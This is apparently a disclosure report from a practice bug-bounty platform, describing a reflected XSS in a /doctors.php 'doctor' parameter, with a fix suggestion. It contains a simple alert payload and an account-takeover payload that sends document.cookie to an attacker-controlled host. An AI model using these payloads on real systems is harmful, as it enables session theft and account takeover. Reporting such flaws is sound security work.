FirstBlood-#1127Reflected XSS
This issue was discovered on FirstBlood v3

On 2022-12-08, pichik Level 4 reported:

Hello zseano,
hope you are doing well, thanks for the next event.

My first bug is reflected XSS in /doctors.php endpoint. There is parameter doctor which is reflected in between <script> tags.
Didnt find any better impact yet so reporting just simple alert.

We just need to escape ' and separate our code, so it wont throw error. Here is payload with simple alert : ';alert(1);'

POC LINK:;alert(document.domain);%27



As I found a way in, Iam increasing impact for this bug as it can be used in a way as my #1335 report. Attacker can use this bug to append cookies to url, send them to his server and steal accounts of doctors. Payload:

ACCOUNT TAKEOVER POC LINK:;window.location.href=%27[attacker-id]?%27%2Bdocument.cookie;%27


HTML Encoding user entered input should prevent XSS easily.

P3 Medium

Endpoint: /doctors.php

Parameter: doctor

Payload: ';alert(1);'

FirstBlood ID: 47
Vulnerability Type: Reflective XSS

The endpoint /doctors.php is vulnerable to reflective XSS via the ?doctor= parameter